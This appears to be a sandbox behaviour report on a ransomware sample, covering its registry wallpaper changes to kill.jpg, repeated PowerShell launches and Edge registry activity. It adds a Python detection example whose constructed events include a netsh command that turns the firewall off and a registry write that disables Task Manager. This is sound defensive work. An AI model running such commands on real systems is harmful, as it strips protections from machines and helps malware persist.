N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
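
The signatures in this run chain together cleanly: the sample queries Geo\Nation, launches powershell.exe repeatedly (flagged as a blocklisted process making network requests), drives netsh.exe to change the firewall, disables Task Manager through the registry, and has reg.exe rewrite HKCU\Control Panel\Desktop\Wallpaper to kill.jpg 36 times. The detection logic below is an added example, not part of the report or any vendor's rule set; it encodes each of those behaviours as a small rule over process-creation and registry events and counts hits. The SID, image paths, Wallpaper value and Geo\Nation path are taken from the report; the parent-process links, the netsh command lines, the DisableTaskMgr value (the standard mechanism, which the report does not show) and the two benign events are constructed assumptions.

```python
import re
from collections import Counter

SID = "S-1-5-21-1739856679-3467441365-73334005-1000"   # user SID as listed in the report
HKU = r"\REGISTRY\USER" + "\\" + SID
TEMP_SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# reg.exe setting the wallpaper, exactly as the report lists it (repeated below)
WALLPAPER_SET = {"kind": "reg_set", "image": r"C:\Windows\system32\reg.exe",
                 "target": HKU + r"\Control Panel\Desktop\Wallpaper",
                 "value": r"C:\Users\Admin\Desktop\kill.jpg"}

# Constructed telemetry in a minimal Sysmon-like shape. Parent links, netsh command
# lines and the DisableTaskMgr write are assumptions; the report shows none of them.
SAMPLE_EVENTS = [
    {"kind": "process", "image": TEMP_SAMPLE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": '"' + TEMP_SAMPLE + '"'},
    {"kind": "reg_query", "image": TEMP_SAMPLE,
     "target": HKU + r"\Control Panel\International\Geo\Nation"},
    {"kind": "process", "image": POWERSHELL, "parent": TEMP_SAMPLE,
     "cmdline": "powershell.exe -NoProfile -Command <constructed placeholder>"},
    {"kind": "process", "image": r"C:\Windows\system32\netsh.exe", "parent": TEMP_SAMPLE,
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"kind": "process", "image": r"C:\Windows\SYSTEM32\netsh.exe", "parent": TEMP_SAMPLE,
     "cmdline": "netsh advfirewall set currentprofile state off"},
    {"kind": "reg_set", "image": r"C:\Windows\system32\reg.exe",
     "target": HKU + r"\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
     "value": "1"},
] + [WALLPAPER_SET] * 3 + [
    # Benign look-alikes that must stay silent
    {"kind": "process", "image": POWERSHELL, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\ProgramData\\maint.ps1"},
    {"kind": "reg_set", "image": r"C:\Windows\explorer.exe",
     "target": HKU + r"\Control Panel\Desktop\Wallpaper",
     "value": r"C:\Users\Admin\Pictures\beach.jpg"},
]


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _ends(path, suffix):
    return path.lower().endswith(suffix.lower())


def wallpaper_set_by_reg_exe(e):
    # Command-line reg.exe rewriting the wallpaper value is the ransomware tell here
    return (e["kind"] == "reg_set" and _base(e["image"]) == "reg.exe"
            and _ends(e["target"], r"\Control Panel\Desktop\Wallpaper"))


def taskmgr_disabled(e):
    # Assumed value name: DisableTaskMgr=1 under Policies\System (standard mechanism)
    return (e["kind"] == "reg_set"
            and _ends(e["target"], r"\Policies\System\DisableTaskMgr")
            and str(e.get("value")) == "1")


def firewall_changed_by_netsh(e):
    return (e["kind"] == "process" and _base(e["image"]) == "netsh.exe"
            and re.search(r"\badvfirewall\b|\bfirewall\b", e.get("cmdline", ""), re.I) is not None)


def powershell_spawned_from_temp(e):
    return (e["kind"] == "process" and _base(e["image"]) == "powershell.exe"
            and "\\appdata\\local\\temp\\" in e.get("parent", "").lower())


def geo_nation_queried_from_user_dir(e):
    # Low fidelity alone; useful as corroboration next to the rules above
    return (e["kind"] == "reg_query"
            and _ends(e["target"], r"\Control Panel\International\Geo\Nation")
            and e["image"].lower().startswith("c:\\users\\"))


RULES = [wallpaper_set_by_reg_exe, taskmgr_disabled, firewall_changed_by_netsh,
         powershell_spawned_from_temp, geo_nation_queried_from_user_dir]


def evaluate(events, rules=RULES):
    """Return ({rule_name: hit_count}, [(rule_name, event), ...])."""
    hits, matched = Counter(), []
    for e in events:
        for rule in rules:
            if rule(e):
                hits[rule.__name__] += 1
                matched.append((rule.__name__, e))
    return dict(hits), matched


if __name__ == "__main__":
    hits, _ = evaluate(SAMPLE_EVENTS)
    for name, n in sorted(hits.items(), key=lambda kv: -kv[1]):
        print(f"{n:3d}  {name}")
```

The hit counts matter as much as the rule names: a single wallpaper write or one netsh call is routine administration, while dozens of each from a process tree rooted in a Temp-resident unsigned executable is what this report shows. Feed the same predicates real Sysmon EventID 1, 12 and 13 records after mapping the field names.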

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = eb839459fdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2a59ea59fdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
